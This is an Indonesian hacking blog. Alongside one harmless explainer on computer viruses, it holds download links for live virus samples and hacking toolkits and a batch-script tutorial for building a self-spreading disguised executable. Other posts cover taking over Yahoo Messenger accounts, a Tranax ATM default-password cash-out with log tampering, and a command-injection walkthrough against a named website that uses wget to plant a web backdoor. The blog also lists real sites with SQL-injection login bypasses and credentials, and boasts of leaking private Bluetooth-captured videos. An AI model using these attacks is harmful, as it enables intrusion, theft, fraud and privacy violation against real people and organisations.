-=:.BrownSugarFree.:=-

Posted by -=:.BrownSugarFree.:=- at 12:25 AM | Permalink | Comments

Pada dasarnya, virus komputer adalah sebuah program komputer yang memiliki kemampuan untuk menggandakan diri dengan cara menyisipkan programnya kedalam sebuah file lain. Mirip seperti virus biologis, virus komputer dapat menyebar dengan cepat pada file-file dalam sebuah komputer, atau bahkan menulari file di komputer lain, baik melalui jaringan maupun lewat kegiatan tukar-menukar file.



Dahulu kita mengenal pembagian virus berdasarkan sasaran penyebarannya, yaitu virus boot sector dan virus file. Virus boot sector didesain oleh pembuatnya untuk menginfeksi boot sector, yakni bagian dari sebuah media penyimpanan (disket, hard disk) yang pertama kali dibaca oleh sistem operasi saat media tersebut diakses. Sekali media penyimpanan yang terinfeksi oleh virus jenis ini dipakai untuk melakukan booting, maka virus pun menetap di memory dan siap menginfeksi media penyimpanan lain yang digunakan di komputer yang sama. Belakangan, virus boot sector berkembang menjadi tipe yang lebih ganas, yaitu yang dikenal sebagai virus partisi (partition table). Tabel partisi adalah bagian pada hard disk yang menyimpan data-data CHS (cylinder/head/sector) yang menjadi pedoman bagi sistem operasi untuk melakukan proses pembacaan. Sekali bagian ini dihancur-leburkan oleh virus, maka tentunya hard disk tidak lagi dapat dibaca dan seluruh data didalamnya pun melayang.



Sementara itu, virus file bekerja dengan cara menyisipkan programnya dalam sebuah file. Dahulu, saat penggunaan sistem operasi DOS masih meluas, sasaran virus jenis ini adalah file-file executable, yakni yang namanya berakhiran dengan ekstensi .COM atau .EXE. Selain melakukan penularan, virus file seringkali menambahkan perintah-perintah tertentu pada kode program yang ditularinya. Umumnya virus semacam ini memiliki sifat sebagai "bom waktu", dimana program virus akan melakukan aksinya pada waktu-waktu tertentu yang telah ditentukan oleh si programmer. "Aksi" ini bisa bermacam-macam, mulai dari yang ringan seperti menampilkan pesan dan membunyikan speaker, hingga melakukan perusakan dengan menghapus data, atau bahkan memformat hard disk!



Belakangan, saat penggunaan program berbasis Windows mulai marak dengan aneka macam fitur, maka kita kembali mengenal satu jenis virus baru, yakni virus macro. Macro adalah serangkaian perintah--mirip perintah dalam bahasa pemrograman--yang disediakan oleh perangkat lunak yang memungkinkan penggunanya untuk menyusun suatu rangkaian pekerjaan tertentu. Rangkaian perintah tersebut akan dijalankan sekaligus oleh perangkat lunak saat macro dijalankan. Fasilitas macro berguna untuk memudahkan pengguna dalam melakukan langkah-langkah yang berurutan dan berulang-ulang. Celakanya, fasilitas ini akhirnya disalah gunakan oleh tangan-tangan jahil untuk membuat macro yang berisi perintah-perintah penularan dan bahkan perusakan!



Jenis virus macro yang terkenal adalah virus WordMacro yang khusus dibuat untuk menginfeksi file data dari perangkat lunak pengolah kata Microsoft Word (berekstensi .DOC). Virus jenis ini memiliki hingga ribuan varian dengan aneka macam jenis gangguan. Mulai dari yang hanya menampilkan pesan pada waktu-waktu tertentu, hingga melakukan perusakan pada file. Virus WordMacro tergolong memiliki varian paling banyak karena kode-kodenya yang mudah untuk dimodifikasi. Disamping itu, mempelajari macro pada MS Word tidaklah sesulit mempelajari bahasa Assembly atau C (bahasa pemrograman yang sering digunakan untuk membuat program virus).



TROJAN HORSE DAN WORM



Selain virus dalam artian seperti disebut diatas, kita juga mengenal program yang disebut Trojan Horse (Kuda Troya). Trojan Horse sebenarnya bukanlah sebuah virus dalam artian sesungguhnya, karena program ini tidak memiliki kemampuan untuk menggandakan dirinya ke program lain. Namun demikian, program ini tidak kalah berbahaya jika dibandingkan dengan program virus komputer.



Trojan Horse umumnya dikemas dalam bentuk sebuah program yang menarik. Namun dibalik daya tarik software tersebut, tersembunyi fungsi lain untuk melakukan perusakan. Pengguna komputer yang mendapatkan file ini umumnya akan terpancing untuk menjalankannya. Akibatnya tentu fatal, karena dengan demikian si pengguna telah meenjalankan rutin-rutin perusak yang siap menebar bencana di komputernya.



Sumber malapetaka lain yang mirip dengan virus (namun tidak bisa dikatagorikan sebagai virus) adalah worm. Worm biasa menyebar melalui e-mail, berupa sebuah program kecil yang diattachkan pada sebuah pesan e-mail. Pengguna yang tertarik akan menjalankan program tersebut. Selanjutnya, bisa ditebak, si program akan langsung melakukan aksinya. Worm akan menggandakan diri dengan mengirimkan filenya secara otomatis melalui attachment ke setiap alamat yang ada dalam address book pada software e-mail korban. Umumnya worm tidak bersifat merusak, namun demikian selain mengakibatkan kejengkelan di pihak korban, serangan worm dapat sangat berbahaya bagi mailserver. Berjangkitnya worm menyebabkan beban kerja mailserver melonjak drastis hingga dapat mempengaruhi performanya.



Worm umumnya berbentuk file executable (berekstensi .EXE datau .SCR), yang terlampir (attach) pada email. Namun demikian, ada beberapa jenis worm yang berbentuk script yang ditulis dalam bahasa Visual Basic (VBScript). Sasaran serangan worm jenis ini terutama adalah perangkat lunak e-mail Microsoft Outlook Express.



ANTI VIRUS



Dewasa ini, berbagai perangkat lunak telah tersedia di pasaran sebagai penangkal terhadap serangan virus. Program ini biasanya bekerja dengan cara memindai (scan) sebuah file dan mencocokkannya dengan ciri-ciri virus yang ada dalam databasenya. Bagian lain dari program anti virus merupakan program yang menetap (residen) di memory komputer. Bagian ini berfungsi untuk memonitor aktivitas baca-tulis pada media penyimpanan terhadap adanya "anomali" yang mungkin disebabkan oleh adanya virus. Tidak semua virus dapat dihilangkan oleh anti virus. Beberapa jenis virus melakukan penimpaan (overwrite) terhadap file yang ditularinya. File yang terjangkit virus jenis ini mustahil untuk dapat diperbaiki.



Beberapa jenis virus diracang untuk mengelabui program-program anti virus yang ada saat ini. Virus jenis ini diantaranya adalah tipe stealth dan polymorphic. Virus tipe stealth (siluman) bekerja dengan mengelabui sistem seolah-olah sebuah file berada pada kondisi normal sehingga virus tidak terdeteksi oleh program anti virus, walaupun pada kenyataannya file tersebut telah terinfeksi. Sementara itu virus bertipe polymorphic mampu untuk mengubah ciri-cirinya setiap kali menulari sebuah file. Dengan selalu mengubah dirinya, sang programmer virus berharap dapat menyulitkan para pembuat anti virus dalam mengenali ciri-ciri virus buatannya. Beberapa jenis virus menggunakan gabungan dari kedua teknik ini yang kemudian digolongkan sebagai virus tipe hybrid (campuran).



Bagaimanapun perang antara pembuat virus dengan pembuat antinya akan terus berlanjut. Pembuat virus jelas selalu berada selangkah didepan, sementara pembuat anti virus juga tidak mau ketinggalan untuk terus meneliti dan membuat penangkal untuk virus-virus baru. Dewasa ini setidaknya 200 virus baru muncul setiap bulannya. Ada kecurigaan yang beredar dikalangan pengguna komputer bahwa sebenarnya para pembuat anti virus justeru "berkomplot" dengan para programmer virus untuk meningkatkan penjualan produknya, namun demikian sejauh ini dugaan tersebut belum pernah terbukti kebenarannya.



MENGHINDARI ANCAMAN VIRUS



Sebagai pengguna komputer, ada beberapa langkah yang dapat kita lakukan untuk menghindari sistem kita dari ancaman virus maupun akibat-akibat buruk yang ditimbulkannya:



1. Pasang Anti Virus pada sistem anda

Sebagai perlindungan di garis depan, penggunaan anti virus adalah wajib. Ada banyak anti virus yang beredar di pasaran saat ini. Beberapa yang cukup handal diantaranya adalah McAfree VirusScan (http://www.mcafee.com/) dan Norton Anti Virus (http://www.symantec.com/).



2. Update database program anti virus secara teratur

Ratusan virus baru muncul setiap bulannya. Usahakan untuk selalu meng-update database dari program anti virus yang anda gunakan. Database terbaru dapat dilihat pada website perusahaan pembuat program anti virus yang anda gunakan.



3. Berhati-hati sebelum menjalankan file baru

Lakukan scanning terlebih dahulu dengan anti virus sebelum menjalankan sebuah file yang didapat dari mendownload di internet atau mengkopi dari orang lain. Apabila anda biasa menggunakan sarana e-mail, berhati-hatilah setiap menerima attachment dalam bentuk file executable. Waspadai file-file yang berekstensi: *.COM, *.EXE, *.VBS, *.SCR, *.VB. Jangan terkecoh untuk langsung membukanya sebelum melakukan scanning dengan software anti virus.



4. Curigai apabila terjadi keanehan pada sistem anda

Menurunnya performa sistem secara drastis, khususnya saat melakukan operasi pembacaan/penulisan file di disk, serta munculnya masalah pada software saat dioperasikan bisa jadi merupakan indikasi bahwa sistem telah terinfeksi oleh virus. Berhati-hatilah!



5. Backup data anda secara teratur

Tips ini mungkin tidak secara langsung menyelamatkan data anda dari ancaman virus, namun demikian akan sangat berguna apabila suatu saat virus betul-betul menyerang dan merusak data di komputer yang anda gunakan. Setidaknya dalam kondisi tersebut, anda tidak akan kehilangan seluruh data yang telah anda backup sebelumnya.



 

Posted by -=:.BrownSugarFree.:=- at 12:05 AM | Permalink | Comments

donload aja nih..kali aja berguna :))

WYX bisa ngilangin partisi hardisk elo...nah ngerepotin juga dong @_@
http://indoupload.net/files/1026/WYX.b.zip

Brontok pastinya dah tahulah efek2 dari virus ini,ngeselin memang tapi dah banyak yang berlomba ngalahin nih virus
http://indoupload.net/files/1026/Brontok.zip

W32WUKILL namanya aja dah KILL pasti ngebantai kompi deh
http://indoupload.net/files/1026/W32WUKILL.zip

Rem_Gadis_Unmul ni yang ngebuat bener2 pecinta wanita kali ya $_$
http://indoupload.net/files/1026/Rem_Gadis_Unmul.zip

Gutbai so say goodbye buat OS elo deh
http://indoupload.net/files/1026/Gutbai.zip

Caribe mo ngikut2 jadi pirate caribean kali
http://indoupload.net/files/1026/Caribe.zip

Posted by -=:.BrownSugarFree.:=- at 11:52 PM | Permalink | Comments

Posted by -=:.BrownSugarFree.:=- at 10:04 PM | Permalink | Comments

Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.
Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe�. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a� c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a� c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.

Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “

Posted by -=:.BrownSugarFree.:=- at 2:34 AM | Permalink | Comments

ini akan memaparkan kepada anda tentang kecerobohan-kecerobohan
yang sering terjadi dikalangan para netter . saya akan memanfaatkan beberapa
kebiasaan buruk yang sering kali dilakukan untuk mengambil alih account
Yahoo Messenger mereka.

Sebagai contoh adalah penggunaan Yahoo! Messenger dengan kondisi korban
memberi mengaktifkan opsi Remember My ID & Password atau korban lupa
tidak melakukan Sign Out

Permasalahan yang ditemukan adalah :/
- Bagaimana cara mengetahui karakter dibalik simbol bintang pada form
password?

Yahoo ID dan Password sudah di depan mata . Tapi passwordnya tertutup
karakter bintang. Menyalin passwordnya ke Text Editor tidak dapat dilakukan
karena Form Password tidak mengizinkan aksi tersebut. Lalu bagaimana?

Berikut langkah-langkah yang sebaiknya anda lakukan (atau SEBAIKNYA
TIDAK ANDA LAKUKAN):

Download program Asterisk Key

Di http://lostpassword.com/asterisk.htm

Ingat jangan tutup dulu Yahoo Messenger yang Yahoo ID dan Password nya sudah di depan mata...


Kalau udah download Asterisk Key, kamu jalankan program tersebut

WUZZZZZAAAAAAA password nya ketahuan deh :censored:

Posted by -=:.BrownSugarFree.:=- at 2:21 AM | Permalink | Comments

Apa itu ATM Machine?

Kepanjangan nya adalah Auto Teller Machine ..

Sebuah mesin yang bisa dikatakan sebagai Bank Mini .. Hehehe ..

Sebuah mesin yang kayaknya udah gak perlu diceritain lagi deh apa dan bagaimananya, karena saya rasa semua orang sudah tahu mengenai mesin ini ..

Yang jelas dengan mesin ini, kalian bisa mengambil duit, tanpa harus pergi ke bank dan melakukan banyak hal lain yang menurut saya pribadi adalah melelahkan .. Ngisi form lah, apalah .. Capek dude xD~~

Nah, sering kali tuh terjadi rumor .. Bisa gak sih ATM di Hack??!

Gimana sih caranya?? Dalam kesempatan kali ini, saya akan membuat sebuah tutorial dan artikel bersifat informatif singkat berkenaan dengan kemungkinan hacking ATM Machine itu sendiri .. Sebenarnya ada banyak cara, dan kebanyakan cara bisa anda lihat di http://www.sate.name .. Tapi dalam kesempatan kali ini, saya akan sedikit membahas mengenai masalah teknis yang ada xD~~

So .. Lets start the GAME xD~~

Hal ini hanya bekerja untuk mesin tipe Tranax Minibank 1500 Series ..

Kalau anda teliti .. Anda bisa mendapatkan sebuah informasi penting dari series yang saya berikan diatas xD~~

Berikut adalah cuplikan dari Manual Book yang saya baca:

To access the Operator Function menu, hold the , and keys simultaneously for 2 seconds, release them and press 1, then press 2, then press 3. The timing of this procedure can be difficult at first.

Jadi intinya untuk masuk kedalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol , dan secara bersamaan selama 2 detik, lepaskan mereka, dan tekan tombol 1, kemudian 2, dan 3. Mungkin timing awalnya akan susah pada saat anda mencoba pertama kali .. xD~~

Kalau anda kesulitan untuk login ..

Cara kasarnya juga ada .. Wakakaka ..

Matikan power ATM mesin, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan pada saat anda menyalakan kembali ATM, dia akan lgsg masuk pada Operator Function ..

Susah memang ..

But no pain .. No gain right?? xD~~

Setelah masuk ke dalam Operator Function .. Anda akan ditanyai 3 jenis password, yang mana anda dapat memilih 1 dari antara 3 itu:

- Operator Password (Ini untuk meng-akses menu dasar struktur ATM)

- Service Password (Mengijinkan akses ke menu dasar dan diagnostic menu)

- Master Password (Mengijinkan anda mengakses penuh mesin tersebut)

Disini adalah kunci dari pembicaraan kita ..

Pada mesin Tranax MiniBank 1500 Series .. Default Master Password nya adalah "000000" (Tanpa kutip) .. Dan saya rasa tidak banyak yang merubah default password itu, Hehehe ..

Dari sana anda bisa melakukan banyak hal ..

Termasuk diantaranya "reset the status of the cash cartridges" .. Yang dimana membuat anda mgkn saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat cashingnya menjadi 4x lipat lebih banyak .. Namun bank akan hanya me-reduce uang anda sebanyak 100rb sesuai request anda .. Hehehehe ..

Menarik bukan??!

Wakakaka ..

Perihal .. Bagaimana apabila kita terlacak??

Dengan Master Password, anda bisa merubah jam transaksi, merubah entire timing dan printing data ATM, dll dsb dst .. Yah, kreasikan sendiri utk bisa kabur dr tuduhan .. Jadi intinya, yang perlu anda takuti adalah .. Security Cameras

NB: Tutorial ini hanya dibuat untuk pembelajaran dan pembuktian bahwa ATM Hacking itu mgkn terjadi. Oleh dari karena itu saya tidak membahas jauh lebih men-detail, berikut juga merupakan sebuah bukti bahwa "Lubang" keamanan ini sedang sedemikian rupa di patch oleh pihak Tranax: Baca Disini!!! .. Sekian

Posted by -=:.BrownSugarFree.:=- at 2:12 AM | Permalink | Comments

lo mau nyari music kesukaan lo dan langsung dapet..wach pasti menghemat waktu berinternet lo kan??
dengan menggunakan javascript ini mudah2an bermanfaat yach...^_*


Nich Code-nya :

javascript:void(qr=prompt('th3sn0wbr4in%20-%20Mesin%20Pencari%20Musik%20-%20 Ketik%20Judul%20lagu%20Atau%20Album%20dibawah%20ini:%20','')); if(qr)location.href='http://www3.google.com/search?&num=100&hl=en&ie=UTF-8&oe=UTF-8&btnG= Google+Search&as_epq=parent+directory=&as_oq= mp3+wma+ogg+anonymous&as_eq=module+modules&lr=&as_ft=i&as_filetype= &as_qdr=all&as_occt=any&as_dt= i&as_sitesearch=&safe=images&as_q='+escape(qr);void%201;


Copy Code di atas ke Address Bar (Apaan Tuch Address Bar...? Tempat Lo Ngetik WWW

Nanti akan muncul Dialog Box dan Lo tinggal ketik nama Lagu Band
atau Lo Coba-Coba aja sendiri dan akan muncul hasil Pencarian dari Google

Nach Selamat Berburu Music

Posted by -=:.BrownSugarFree.:=- at 1:37 AM | Permalink | Comments

jangan salah paham ya dengan posstingan ini,cuman UNTUK BELAJAR!!!!!



download di link berikut ini

Code:
http://rapidshare.de/files/5200040/GHS.rar





download di link berikut ini

Code:
http://rapidshare.de/files/13934677/HTS2006-Part001.zip.html
http://rapidshare.de/files/13938752/HTS2006-Part001.z01.html
http://rapidshare.de/files/13944669/HTS2006-Part001.z02.html

download semua, masukkan dalam satu folder yg sama. buka yang HTS2006-Part001.zip dulu (disarankan pake winzip 9 atau atau lbh tinggi)







Code:
http://rapidshare.de/files/21345627/ffff.rar
atau
http://rapidshare.de/files/13357380/Huge_Hacking_Appz_s.rar.html

catatan:
beberapa tool kedetect oleh antivirus sebagai virus/trojan. Karena emang tool ginian bukan dalam 'system' yg benar.








Code:
http://rapidshare.de/files/11904031/HaPav1.rar.html

RAR Password : BlackIDTEAM






Code:
http://rapidshare.de/files/10514797/Hackers_toolkit_2005.zip.htm


met download dan met menikmati...^_^

bestregards,



-=BrownSugarFree=-

Posted by -=:.BrownSugarFree.:=- at 1:13 AM | Permalink | Comments

wew..ni dia video2 lokal seru2 empuk..wakakakakak....
makanya ati2 kalo bluetoothan kecapture dech tuh sama gue...
so sorry ya jadi dipublish ni videonya..hehehe...
warning video ini buka untuk disebarluaskan ya...kalo mo nonton yach di sini aza...
takut ketahuan sama yang bersangkutan bisa XXXX dech...

Selamat Menikmati...

Posted by -=:.BrownSugarFree.:=- at 11:41 PM | Permalink | Comments

gue nggak akan jelaskan mengapa command execution ini bisa terjadi,
Kalo ingin mengcari tahu, silahkan mencari di google dan baca …
So, Kita langsung ajah….

SATU :
Mencari Target…
1. Buka Opera, internet explorer, mozilla dll
2. Masukkan alamat www.google.com di address bar
3. Masukkan keyword pencarian.
Catatan :
Trick menggunakan keyword dalam mencari bug cgi / perl :
a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari
b. Gunakan key “allinurl:”
c. Gunakan tanda petik ganda (“) jika diperlukan
contoh 1:
allinurl: “news.cgi?news=” txt
Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan
Di buka yakni file dengan ektensi txt.
Contoh 2 :
allinurl: cgi action dat
ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang
didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan
parameter action dan membuka file dengan ektensi dat.
(dengan key inilah bug WPS_SHOPPING ditemukan).
4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini
kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search
dan hasilnya ………………………………………..:

DUA:
Exploitasi:

1. Sekarang kita masuk ke exploitasi :
Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua
Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan
dibuka.
Sebagai contoh:
Sekarang kita lihat url pada halaman pertama, yakni :
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0
Klick kanan url tersebut dan klick open in new window.
Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting
tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni :
file=.file0011.dat|ls|
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0
(ls dalam command di linux shell adalah sama dengan dir pada windows, yakni
melihat seluruh file directory aktif)
yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan,
yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu
artinya webserver tersebut vulnerable untuk di hack…!!!!
Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’
Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat.
Yupe, sekarang coba kita lihat id kita:
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0
hasilnya : uid = bla bla bla
Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.

2. Memasukkan backdoor. (web backdoor)
Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............
Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan
Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake
penyamaran nama file yang bener2 ok)
Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang
terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa.
Karena kita melakukannya lewat port 80….!!!
Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt"
Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target.
Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni
command di linux yang khusus untuk download ke web server.
Catatan :
Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya
Adalah menggunakan lwp-download, fasilitas download dari perl.

Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt,
Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/
Sekarang kita check apakah kita berhasil ato tidak.
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya
kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
sekarang kita chek lagi :
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
Yupe sekarang ada tampilan source dari cgitelnet.txt.
Selamat berhasil….!!!! :P~
Baik sekarang apa selanjutnya..???
Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah
Chmod-nya ke 755 agar kita bisa mengexekusi-nya.
a. Merubah nama cgitelnet.txt ke cgitelnet.cgi
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0
b. Merubah chmod ke 755
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0

TIGA :
Execkusi backdoor dan selancar di system target

Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba
kita exekusi:
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi
tampilan yang muncul adalah :
login: admin
password: enter

baik sekarang kita masukkan password. Password = changeme
daaaannn…. Hasilnya adalah :

[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$

selesai….!!!!!

Oke, sekarang info:
Pada contoh di atas, saya menggunakan bug pada zdiary.cgi.
zdiary v1.51, v1.52 (all version) by mikazo
untuk mencari webserver yang menginstall zdiary, gunakan key word pada google
sebagai berikut :
allinurl: “zdiary.cgi”

 

Posted by -=:.BrownSugarFree.:=- at 6:37 PM | Permalink | Comments

 ***************** ßy: brownsugarfree******************







http://www.dolphinstreetdesigns.net/shopping/shopdbtest.asp
http://www.armoredplanet.com/vpshop/shopdbtest.asp
http://www.mediablend.com/demos/ecommerce/mbstore/store/shopdbtest.asp
http://www.freewebfront.com/admin/orders.asp
http://www.gpscompany.com/necart/lor/admin/orders.asp
https://secure.digiweb.net.nz/modchipsconz/admin/upload.htm
http://www.bruinstuff.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.myeventshots.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.virtualimpact.net/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.idream.com.sg/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.danitasboutique.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.thecarshopnj.com/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.indiarc.netfirms.com/cgi-bin/album/album.pl?photo=DrPonidi.jpg
http://images.girly-geek.com/cgi-bin/album.pl?photo=/pon.jpg
http://www.hbr11.com/cgi-bin/album.pl?photo=DR`PONIDI/pon.jpg
http://www.comersus.com/message.asp?message=Dr`Ponidi+minta+ccnya+dong
http://myanmarbestbuy.com/store/comersus_message.asp?message=
http://www.eltiante.com/shop/store/comersus_message.asp?message=
http://extremetracking.com/free-1/scripts/reports/display/nph-edit.cgi?tag=tigcgi&server=z
http://cheiron.humanities.mcmaster.ca/~htp/cgi/edit.cgi?22
http://www.worldwidewiki.net/wiki/OneBigWikiAlphabeticalIndexS/edit
http://www.worldwidewiki.net/wiki/OneBigWiki/edit
http://urchin.earth.li/cgi-bin/twic/wiki/view.pl?page=RSS







*****Sample*****

http://www.1616us.com/shop/shopadmin.asp login=ylp34a# pass=prod43@
http://www.prc-cosmetics.com/asp/newver/mbh/com/xinqi/manage/login.asp L:admin P:' or '1' = '1
http://www.sdi.com.tw/manage/login.asp L:sdi P:sdi / L:sdi P:' or '1' = '1
http://www.slimlife.biz/manage/login.asp? L:admin P:' or '1' = '1
http://www.nlio.idv.tw/disaster/manage/login.asp L:admin P:' or '1' = '1
http://www.lobsterclub.co.kr/news/list.asp L:admin P:' or '1' = '1
http://teayang.co.kr/manage/Default.asp L:admin P:' or '1' = '1
http://www.kmistc.com/manage/default.asp L:admin P:' or '1' = '1
http://www.yxsz.yn.cn/manage/login1.asp L:admin P:' or '1' = '1
http://bikmrdc.lm.fju.edu.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.erp-china.com/Information/infomanage/login.asp L:admin P:' or '1' = '1
seongdong.seoul.go.kr/%EC%84%B1%EB%8F%99%EC%A7%80%EC%97%AD%EA%B2%BD%EC%A0%9C/ manage/login.asp L:admin P:' or '1' = '1
chinaqd-tianrun.com/zengrun/manage/login.asp L:admin P:' or '1' = '1
http://demo.bechoice.com/newsii/manage/login.asp L:admin P:' or '1' = '1
http://www.0577china.com/glasses/manage/login.asp L:admin P:' or '1' = '1
http://ba.lm.fju.edu.tw/singing/ib/MANAGE/login.asp L:admin P:' or '1' = '1
http://www.daeholoan.com/manage/login.asp L:admin P:' or '1' = '1
http://www.gesfim.fr/Manage/login.asp L:admin P:' or '1' = '1
http://www.sggs-cn.com/manage/login.asp L:admin P:' or '1' = '1
http://www.ebooth.com.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.dachangyt.com/lijing/manage/login.asp L:admin P:' or '1' = '1
